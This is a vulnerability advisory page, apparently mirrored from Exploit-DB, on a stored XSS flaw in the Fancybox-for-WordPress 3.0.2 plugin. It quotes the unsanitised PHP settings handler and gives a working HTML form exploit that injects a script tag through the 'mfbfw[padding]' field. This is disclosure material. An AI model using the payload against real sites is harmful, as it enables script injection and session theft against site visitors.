Wordpress plugin Fancybox-for-WordPress Stored XSS

vendor:

Fancybox-for-WordPress

by:

NULLpOint7r

8.8

CVSS

HIGH

Stored XSS

CWE

Product Name: Fancybox-for-WordPress

Affected Version From: 3.0.2

Affected Version To: 3.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:fancybox-for-wordpress

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

WordPress plugin Fancybox-for-WordPress Stored XSS

A stored cross-site scripting (XSS) vulnerability exists in the Fancybox-for-WordPress plugin version 3.0.2 for WordPress. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application, which will be executed in the browser of the victim when the vulnerable page is accessed. This can be exploited by sending a specially crafted POST request to the vulnerable page with malicious JavaScript code in the 'mfbfw[padding]' parameter.

Mitigation:

Upgrade to the latest version of the Fancybox-for-WordPress plugin.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/

vulnerable code [fancybox.php]:
342.    if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344.        if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346.            $settings = stripslashes_deep( $_POST['mfbfw'] );
347.            $settings = array_map( 'convert_chars', $settings );
348.
349.            update_option( 'mfbfw', $settings );
350.            wp_safe_redirect( add_query_arg('updated', 'true') );  

exploit: 

<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
    <input type="text" name="action" value="update">
    <input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
    <input type="submit" value="Send">
</form>